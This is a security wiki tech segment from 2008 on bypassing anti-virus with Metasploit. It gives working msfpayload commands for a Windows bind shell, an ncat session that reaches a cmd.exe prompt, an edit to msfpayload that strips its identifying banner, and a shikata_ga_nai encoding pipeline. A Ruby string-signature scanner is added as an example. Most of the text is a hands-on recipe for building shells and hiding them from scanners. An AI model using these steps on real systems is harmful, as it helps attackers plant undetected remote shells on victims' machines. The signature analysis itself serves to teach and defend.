From Security Weekly Wiki
Revision as of 18:24, 29 September 2008 by Pauldotcom (→Pass #1 - Metasploit 3.1-release Payload - Unmodified)
Tech Segment: Bypassing Anti-Virus Software The Script-Kiddie Way
Pass #1 - Metasploit 3.1-release Payload - Unmodified
msfpayload windows/shell_bind_tcp LPORT=6453 X > payload.exe
The above command produces a Windows executable that listens on TCP port 6453 and hands a cmd.exe shell to whoever connects (a bind shell, so the attacker must be able to reach the port). You can connect to it with netcat (Nmap's ncat in the session below):
funnyhostname:~ pdc$ ncat 192.168.169.40 6453
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\Documents and Settings\Administrator\Desktop>
"Reverse Engineering The Payload"
bash-3.2# strings payload.exe
!This program cannot be run in DOS mode.
.text
.rdata
@.data
.bss
.idata
Created by msfpayload (http://www.metasploit.com).
Payload: windows/shell_bind_tcp
Length: 317
Options: LPORT=6453
Running strings is all it takes: msfpayload embeds a plain-text note naming the tool, the payload module and the options in every executable it produces, which is about the easiest possible thing for a string-based anti-virus signature to match.
Pass #2 - Metasploit Payload - Changed Version String
Editing the msfpayload script so that the note it embeds in the executable no longer identifies the generator (this is the branch that handles the X output type; the rest of the script is unchanged):
if (cmd =~ /^x/)
  note =
    "PaulDotCom's Evil Payload\n" +
    "Payload: " + payload.refname + "\n" +
    " Length: " + buf.length.to_s + "\n" +
    "Options: " + options + "\n"
Note that only the first line of the note changes; the "Payload: windows/shell_bind_tcp" line and the options are still written into the binary in clear text.
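As an added example (not part of the original page, and not Metasploit code), the following Ruby rebuilds the note text the way the msfpayload snippet above concatenates it, runs a poor man's strings(1) over two constructed stand-ins for the pass 1 and pass 2 executables, and checks the extracted strings against a small, made-up set of string signatures of the kind a signature-based scanner carries. The names build_note, printable_strings, scan_for_markers, MARKERS and the STUB/PASS1/PASS2 blobs are all this example's own, and the blobs are constructed here rather than taken from real binaries. It demonstrates the point made above: swapping the banner removes the "Created by msfpayload" hit, but a signature on the remaining "Payload: windows/" line still fires.

```ruby
# Added example, not code from the Security Weekly page or from Metasploit.
# Rebuild the note exactly the way the edited msfpayload branch concatenates it
# (banner, payload refname, length, options), so both variants can be compared.
def build_note(banner, refname, length, options)
  banner + "\n" +
    "Payload: " + refname + "\n" +
    " Length: " + length.to_s + "\n" +
    "Options: " + options + "\n"
end

# Poor man's strings(1): every run of at least `min` printable ASCII bytes.
# Newlines are not printable, so each line of the note comes out as its own string.
def printable_strings(blob, min = 4)
  blob.b.scan(/[\x20-\x7e]{#{min},}/n)
end

# Hypothetical string signatures; real AV engines carry far larger sets, but
# the mechanism (match a fixed substring in the file) is the same.
MARKERS = {
  "msfpayload-banner" => /Created by msfpayload/,
  "metasploit-url"    => /metasploit\.com/,
  "msf-payload-note"  => /^Payload: windows\//,
}

# Return the names of the signatures that hit on a blob.
def scan_for_markers(blob)
  strs = printable_strings(blob)
  MARKERS.select { |_, re| strs.any? { |s| s =~ re } }.keys
end

# Constructed stand-ins for the two executables: a fake DOS header and stub,
# followed by the note as msfpayload would embed it, padded with NULs.
STUB  = "MZ\x90\x00".b + "\x00" * 60 +
        "!This program cannot be run in DOS mode.\r\n$".b + "\x00" * 32

# Pass 1: the unmodified note, values taken from the strings output above.
PASS1 = STUB + build_note("Created by msfpayload (http://www.metasploit.com).",
                          "windows/shell_bind_tcp", 317, "LPORT=6453").b + "\x00" * 16

# Pass 2: only the banner line was changed in the msfpayload script.
PASS2 = STUB + build_note("PaulDotCom's Evil Payload",
                          "windows/shell_bind_tcp", 317, "LPORT=6453").b + "\x00" * 16

if __FILE__ == $0
  puts "pass 1 hits: #{scan_for_markers(PASS1).inspect}"
  puts "pass 2 hits: #{scan_for_markers(PASS2).inspect}"
end
```

Run against a real payload.exe by replacing the constructed blobs with File.binread("payload.exe"); the same three regexes are a reasonable first check that a pass 2 or pass 3 binary no longer carries the generator's fingerprints in clear text.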
Pass #3 - Metasploit Payload Encoded With Shikata Ga Nai
msfencode takes the encoder name with -e and expects raw shellcode on its input (the R output of msfpayload), not an already-built executable, so the payload is generated and encoded in one pipeline and wrapped in an executable with -t exe:
msfpayload windows/shell_bind_tcp LPORT=6453 R | msfencode -e x86/shikata_ga_nai -t exe > svn-encode-payload.exe
Feeding a finished .exe through -i would treat the whole PE file as shellcode to be encoded, which is not what is wanted. Shikata Ga Nai is a polymorphic XOR additive-feedback encoder, so every run yields a different decoder stub and encoded body; that breaks signatures written against the payload bytes themselves, but it does nothing about the unencoded executable template the shellcode is dropped into, which is why encoding alone is not a reliable bypass.